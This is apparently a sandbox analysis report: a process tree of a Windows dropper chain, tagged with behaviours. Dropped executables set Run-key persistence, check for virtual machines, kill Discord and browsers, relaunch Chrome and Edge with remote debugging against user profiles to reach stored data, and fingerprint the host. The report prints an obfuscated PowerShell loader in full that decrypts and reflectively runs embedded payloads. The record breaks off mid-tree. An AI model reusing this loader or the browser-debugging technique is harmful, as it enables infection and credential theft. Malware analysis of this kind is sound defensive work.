PID 3440 wrote to memory of 3048	3440	amnew.exe	131
PID 3744 wrote to memory of 4032	3744	skotes.exe	132
PID 3744 wrote to memory of 4032	3744	skotes.exe	132
PID 1192 wrote to memory of 3244	1192	2z0787.exe	133
PID 1192 wrote to memory of 3244	1192	2z0787.exe	133
PID 1192 wrote to memory of 3244	1192	2z0787.exe	133
PID 4616 wrote to memory of 3660	4616	b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe	134
PID 4616 wrote to memory of 3660	4616	b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe	134

C:\Users\Admin\AppData\Local\Temp\b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe
"C:\Users\Admin\AppData\Local\Temp\b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4616
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\t3k24.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\t3k24.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k77o9.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1k77o9.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3744
    - - C:\Users\Admin\AppData\Local\Temp\1075597001\BwStzYG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1075597001\BwStzYG.exe"
        5⤵
        Executes dropped EXE
        
        PID:1860
    - - C:\Users\Admin\AppData\Local\Temp\1075681001\Ubrlj6S.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1075681001\Ubrlj6S.exe"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3564
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4168
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2148
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3324
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2104
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4440
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:988
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4468
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:940
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:452
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4240
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1276
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FO CSV /NH
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1280
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM discord.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:988
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3636
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=8139 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --start-minimized
        6⤵
        Uses browser remote debugging
        
        PID:3000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff84cb346f8,0x7ff84cb34708,0x7ff84cb34718
        7⤵
        
        PID:3560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1544,12713519915292919971,2113703108173426024,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1560 /prefetch:2
        7⤵
        
        PID:1488
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1544,12713519915292919971,2113703108173426024,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1856 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4600
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8139 --allow-pre-commit-input --field-trial-handle=1544,12713519915292919971,2113703108173426024,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2188 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3504
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=8827 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --start-minimized
        6⤵
        Uses browser remote debugging
        Suspicious use of AdjustPrivilegeToken
        
        PID:3784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff84c4ccc40,0x7ff84c4ccc4c,0x7ff84c4ccc58
        7⤵
        
        PID:1164
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1492,i,4320330338885442521,3642151412765954122,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1460 /prefetch:2
        7⤵
        
        PID:3280
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1868,i,4320330338885442521,3642151412765954122,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1864 /prefetch:3
        7⤵
        
        PID:3440
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1072
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1360
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2496
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3992
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2872
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4404
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:516
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4228
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3936
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4132
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4652
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4344
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:728
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
      - C:\Windows\system32\hostname.exe
        
        "hostname"
        6⤵
        
        PID:2232
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name /value
        6⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:3024
      - C:\Windows\system32\getmac.exe
        
        "getmac" /fo list /v
        6⤵
        
        PID:4492
      - C:\Windows\system32\netsh.exe
        
        "netsh" advfirewall show allprofiles state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3672
    - - C:\Users\Admin\AppData\Local\Temp\1075826001\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1075826001\amnew.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3440
      - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        6⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\10001140101\482ec4200b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001140101\482ec4200b.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2892
    - - C:\Users\Admin\AppData\Local\Temp\1075840001\BwStzYG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1075840001\BwStzYG.exe"
        5⤵
        Executes dropped EXE
        
        PID:4032
    - - C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:740
      - C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3992
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 740 -s 948
        6⤵
        Program crash
        
        PID:848
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1075842041\tYliuwV.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3968
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2084
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z0787.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z0787.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1192
  - - C:\Users\Admin\AppData\Local\Temp\G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
      "C:\Users\Admin\AppData\Local\Temp\G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2036
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:4052
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff84c4ccc40,0x7ff84c4ccc4c,0x7ff84c4ccc58
        6⤵
        
        PID:4992
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2140,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2060 /prefetch:2
        6⤵
        
        PID:5068
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1916,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2188 /prefetch:3
        6⤵
        
        PID:1304
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2320,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2324 /prefetch:8
        6⤵
        
        PID:3268
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3224 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1836
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3248 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2872
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4288,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4320 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:4224
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4460,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4708 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3428
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3852,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4728 /prefetch:8
        6⤵
        
        PID:2868
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4920,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3208 /prefetch:8
        6⤵
        
        PID:1784
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5160,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=5148 /prefetch:8
        6⤵
        
        PID:4816
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5344,i,9403590043200565725,4862597301681349345,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=5148 /prefetch:8
        6⤵
        
        PID:4120
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:2868
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
